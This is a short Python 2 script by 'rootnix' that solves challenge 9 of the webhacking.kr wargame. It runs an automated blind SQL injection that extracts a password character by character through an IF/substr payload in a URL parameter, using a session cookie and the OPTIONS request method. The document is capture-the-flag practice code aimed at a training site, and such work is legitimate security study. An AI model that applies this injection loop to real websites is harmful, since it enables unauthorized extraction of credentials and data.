# Code by rootnix ( rootnix.in ) @ 2015-08-05
__author__ = 'rootnix'

import re, urllib, urllib2

print "-----------------------------------------------"
print "  Blind SQL Injection Script FOR Challenge 9"
print "    Script by rootnix / http://rootnix.in"
print "-----------------------------------------------"

password=""
leng=11
SESSION = "YOUR SESSION KEY FROM COOKIE"

base_url="http://webhacking.kr/challenge/web/web-09/?no="
for j in range(1,leng+1):
   print "%d/%d Progress..." %(j,leng)
   for i in range(97,126):
       url=base_url + "IF((substr(id,%s,1)IN(%s)),3,0)" % (str(j), str(hex(i)))
       # print(url)
       req=urllib2.Request(url)
       req.get_method = lambda: 'OPTIONS'
       req.add_header('Cookie', "PHPSESSID=%s" % (SESSION))
       read=urllib2.urlopen(req).read()
       # print(read)
       ok = re.findall("Secret",read)
       if ok:
           password=password+chr(i)
           print "Now Password:"+password
           break

print "---------------------------------------------"
print "                   RESULT"
print "   Flag : %s" %(password)
print ""
print "---------------------------------------------"